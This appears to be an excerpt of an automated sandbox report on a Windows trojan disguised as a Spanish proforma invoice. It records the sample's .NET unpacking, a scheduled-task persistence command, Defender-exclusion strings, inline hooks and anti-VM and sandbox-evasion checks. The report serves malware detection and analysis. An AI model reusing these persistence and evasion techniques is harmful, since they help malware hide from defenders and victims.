            Source: C:\Users\user\Desktop\Factura de proforma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD689.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@4/1
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Factura de proforma.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Factura de proforma.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Factura de proforma.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tskpCbAwtxoaw.exe.0.dr, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_070C4BBD push FFFFFF8Bh; iretd 0_2_070C4BBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F75 push ebx; iretd 6_2_00419F7D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0163D0D1 push ecx; ret 6_2_0163D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0483D0D1 push ecx; ret 10_2_0483D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029A9F75 push ebx; iretd 10_2_029A9F7D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD4B5 push eax; ret 10_2_029AD508
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD50B push eax; ret 10_2_029AD572
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD502 push eax; ret 10_2_029AD508
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD56C push eax; ret 10_2_029AD572
            Source: initial sampleStatic PE information: section name: .text entropy: 7.7904887088
            Source: initial sampleStatic PE information: section name: .text entropy: 7.7904887088
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.2bd16b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Factura de proforma.exe PID: 6952, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999904 second address: 000000000299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999B7E second address: 0000000002999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 6384Thread sleep time: -45175s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 4852Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7112Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6368Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 45175Jump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.362850284.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.354893243.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
            Source: explorer.exe, 00000007.00000000.375277413.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160B944 mov eax, dword ptr fs:[00000030h]6_2_0160B944
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160B944 mov eax, dword ptr fs:[00000030h]6_2_0160B944
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB171 mov eax, dword ptr fs:[00000030h]6_2_015EB171
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB171 mov eax, dword ptr fs:[00000030h]6_2_015EB171
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC962 mov eax, dword ptr fs:[00000030h]6_2_015EC962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov ecx, dword ptr fs:[00000030h]6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161513A mov eax, dword ptr fs:[00000030h]6_2_0161513A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161513A mov eax, dword ptr fs:[00000030h]6_2_0161513A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]6_2_015E9100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]6_2_015E9100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]6_2_015E9100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016741E8 mov eax, dword ptr fs:[00000030h]6_2_016741E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]6_2_015EB1E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]6_2_015EB1E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]6_2_015EB1E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016669A6 mov eax, dword ptr fs:[00000030h]6_2_016669A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016161A0 mov eax, dword ptr fs:[00000030h]6_2_016161A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016161A0 mov eax, dword ptr fs:[00000030h]6_2_016161A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]6_2_016651BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]6_2_016651BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]6_2_016651BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]6_2_016651BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C182 mov eax, dword ptr fs:[00000030h]6_2_0160C182
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A185 mov eax, dword ptr fs:[00000030h]6_2_0161A185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612990 mov eax, dword ptr fs:[00000030h]6_2_01612990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A2073 mov eax, dword ptr fs:[00000030h]6_2_016A2073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1074 mov eax, dword ptr fs:[00000030h]6_2_016B1074
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01600050 mov eax, dword ptr fs:[00000030h]6_2_01600050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01600050 mov eax, dword ptr fs:[00000030h]6_2_01600050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]6_2_0161002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]6_2_0161002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]6_2_0161002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]6_2_0161002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]6_2_0161002D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]6_2_01667016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]6_2_01667016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]6_2_01667016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]6_2_015FB02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]6_2_015FB02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]6_2_015FB02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]6_2_015FB02A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B4015 mov eax, dword ptr fs:[00000030h]6_2_016B4015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B4015 mov eax, dword ptr fs:[00000030h]6_2_016B4015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E58EC mov eax, dword ptr fs:[00000030h]6_2_015E58EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]6_2_0167B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov ecx, dword ptr fs:[00000030h]6_2_0167B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]6_2_0167B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]6_2_0167B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]6_2_0167B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]6_2_0167B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016290AF mov eax, dword ptr fs:[00000030h]6_2_016290AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9080 mov eax, dword ptr fs:[00000030h]6_2_015E9080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov ecx, dword ptr fs:[00000030h]6_2_0161F0BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov eax, dword ptr fs:[00000030h]6_2_0161F0BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov eax, dword ptr fs:[00000030h]6_2_0161F0BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663884 mov eax, dword ptr fs:[00000030h]6_2_01663884
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663884 mov eax, dword ptr fs:[00000030h]6_2_01663884
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EF358 mov eax, dword ptr fs:[00000030h]6_2_015EF358
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01613B7A mov eax, dword ptr fs:[00000030h]6_2_01613B7A
